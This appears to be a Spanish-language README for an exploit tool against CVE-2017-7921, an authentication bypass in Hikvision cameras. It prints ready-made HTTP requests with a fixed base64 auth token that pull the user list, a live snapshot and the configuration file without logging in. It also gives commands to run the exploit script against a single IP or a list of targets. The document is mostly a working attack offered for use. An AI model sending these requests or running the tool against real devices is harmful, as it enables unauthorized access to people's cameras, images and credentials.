
Exploit para CVE-2017-7921 dirigido a dispositivos Hikvision con autenticación incorrecta. Obtiene listas de usuarios, capturas de cámara y archivos de configuración mediante solicitudes HTTP manipuladas.
Se descubrió un problema de autenticación inadecuada en dispositivos Hikvision.
La vulnerabilidad de autenticación inadecuada ocurre cuando una aplicación no autentica a los usuarios de manera adecuada o correcta.
Esto puede permitir que un usuario malintencionado escale sus privilegios en el sistema y obtenga acceso a información sensible.
# inj3ction
https://seclists.org/fulldisclosure/2017/Sep/23
Detalles de la vulnerabilidad:
----------------------
Obtener una lista de todos los usuarios y sus roles:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtener una instantánea de la cámara sin autenticación:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
Y lo peor de todo, se puede descargar la configuración de la cámara:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
